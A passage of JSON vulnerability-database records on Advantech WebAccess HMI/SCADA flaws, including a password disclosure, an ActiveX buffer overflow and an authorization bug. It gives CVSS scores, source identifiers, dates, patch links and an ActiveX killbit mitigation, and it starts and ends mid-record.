"integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2014-2366", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2014-04530", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "e493ef22-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-70305", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-2366", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-2366", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2014-2366", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-04530", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201407-478", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-70305", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1" }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "VULHUB", "id": "VHN-70305" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" }, { "db": "CNNVD", "id": "CNNVD-201407-478" }, { "db": "NVD", "id": "CVE-2014-2366" } ] }, "description": { "_id": null, "data": "upAdminPg.asp in Advantech WebAccess before 7.2 allows remote authenticated users to discover credentials by reading HTML source code. This vulnerability allows remote attackers to disclose arbitrary credentials on vulnerable versions of Advantech WebAccess. Authentication is required to exploit this vulnerability. The specific flaw exists within the upAdminPg.asp component. An authenticated user can provide an arbitrary existing account name to this page and receive the account password. An attacker can leverage this vulnerability to then authenticate as the WebAccess Administrator. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess has a password disclosure vulnerability, and its upAdminPg.asp component contains passwords for specific accounts, allowing attackers to exploit vulnerabilities to obtain sensitive information. Advantech WebAccess is prone to a remote information-disclosure vulnerability. This may aid in further attacks. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There are security holes in the upAdminPg.asp script of Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-2366" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" }, { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "BID", "id": "68717" }, { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1" }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-70305" } ], "trust": 3.51 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-2366", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-198-02", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201407-478", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-04530", "trust": 1.0 }, { "db": "BID", "id": "68717", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-003489", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2085", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-250", "trust": 0.7 }, { "db": "IVD", "id": "7D7FEB0F-463F-11E9-8E94-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "E493EF22-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-70305", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1" }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "VULHUB", "id": "VHN-70305" }, { "db": "BID", "id": "68717" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" }, { "db": "CNNVD", "id": "CNNVD-201407-478" }, { "db": "NVD", "id": "CVE-2014-2366" } ] }, "id": "VAR-201407-0235", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1" }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "VULHUB", "id": "VHN-70305" } ], "trust": 1.53470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1" }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04530" } ] }, "last_update_date": "2024-11-23T22:02:05.017000Z", "patch": { "_id": null, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02" }, { "title": "Patch for Advantech WebAccess Password Disclosure Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/47827" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-70305" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" }, { "db": "NVD", "id": "CVE-2014-2366" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-02" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2366" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2366" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" }, { "db": "VULHUB", "id": "VHN-70305" }, { "db": "JVNDB", "id": "JVNDB-2014-003489" }, { "db": "CNNVD", "id": "CNNVD-201407-478" }, { "db": "NVD", "id": "CVE-2014-2366" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1", "ident": null }, { "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-250", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-04530", "ident": null }, { "db": "VULHUB", "id": "VHN-70305", "ident": null }, { "db": "BID", "id": "68717", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-003489", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201407-478", "ident": null }, { "db": "NVD", "id": "CVE-2014-2366", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "7d7feb0f-463f-11e9-8e94-000c29342cb1", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "IVD", "id": "e493ef22-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-250", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04530", "ident": null }, { "date": "2014-07-19T00:00:00", "db": "VULHUB", "id": "VHN-70305", "ident": null }, { "date": "2014-07-15T00:00:00", "db": "BID", "id": "68717", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003489", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-478", "ident": null }, { "date": "2014-07-19T05:09:27.673000", "db": "NVD", "id": "CVE-2014-2366", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-07-18T00:00:00", "db": "ZDI", "id": "ZDI-14-250", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2014-04530", "ident": null }, { "date": "2014-07-23T00:00:00", "db": "VULHUB", "id": "VHN-70305", "ident": null }, { "date": "2014-07-22T00:07:00", "db": "BID", "id": "68717", "ident": null }, { "date": "2014-07-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003489", "ident": null }, { "date": "2014-07-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-478", "ident": null }, { "date": "2024-11-21T02:06:09.530000", "db": "NVD", "id": "CVE-2014-2366", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-478" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Password Disclosure Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-14-250" }, { "db": "CNVD", "id": "CNVD-2014-04530" } ], "trust": 1.3 }, "type": { "_id": null, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-478" } ], "trust": 0.6 } }
var-201708-1712
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-534", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-534", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4093", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-534", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ] }, "id": "VAR-201708-1712", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:04:30.828000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-534", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-534", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-534", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT CreateStream Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-534" } ], "trust": 0.7 } }
var-201909-0988
Vulnerability from variot
In WebAccess, versions 8.4.1 and prior, an improper authorization vulnerability may allow an attacker to disclose sensitive information, cause improper control of generation of code, which may allow remote code execution or cause a system crash. WebAccess Contains an unauthorized authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201909-0988", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.4.1" }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.4.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "NVD", "id": "CVE-2019-13550" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009505" } ] }, "cve": "CVE-2019-13550", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-13550", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2019-32470", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-145408", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-13550", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-13550", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-13550", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-13550", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-32470", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201909-833", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-145408", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "VULHUB", "id": "VHN-145408" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "CNNVD", "id": "CNNVD-201909-833" }, { "db": "NVD", "id": "CVE-2019-13550" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In WebAccess, versions 8.4.1 and prior, an improper authorization vulnerability may allow an attacker to disclose sensitive information, cause improper control of generation of code, which may allow remote code execution or cause a system crash. WebAccess Contains an unauthorized authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a browser-based HMI/SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2019-13550" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "VULHUB", "id": "VHN-145408" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-13550", "trust": 3.3 }, { "db": "ICS CERT", "id": "ICSA-19-260-01", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201909-833", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32470", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-009505", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2019.3558", "trust": 0.6 }, { "db": "IVD", "id": "CA3E2EB5-BC1D-4EE8-91F5-7A25E18DD5F4", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-145408", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "VULHUB", "id": "VHN-145408" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "CNNVD", "id": "CNNVD-201909-833" }, { "db": "NVD", "id": "CVE-2019-13550" } ] }, "id": "VAR-201909-0988", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "VULHUB", "id": "VHN-145408" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "CNVD", "id": "CNVD-2019-32470" } ] }, "last_update_date": "2024-11-23T22:48:14.534000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Licensing Vulnerability (CNVD-2019-32470)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181515" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98362" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "CNNVD", "id": "CNNVD-201909-833" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-285", "trust": 1.0 }, { "problemtype": "CWE-863", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-145408" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "NVD", "id": "CVE-2019-13550" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13550" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13550" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3558/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "VULHUB", "id": "VHN-145408" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "CNNVD", "id": "CNNVD-201909-833" }, { "db": "NVD", "id": "CVE-2019-13550" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "db": "CNVD", "id": "CNVD-2019-32470" }, { "db": "VULHUB", "id": "VHN-145408" }, { "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "db": "CNNVD", "id": "CNNVD-201909-833" }, { "db": "NVD", "id": "CVE-2019-13550" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": 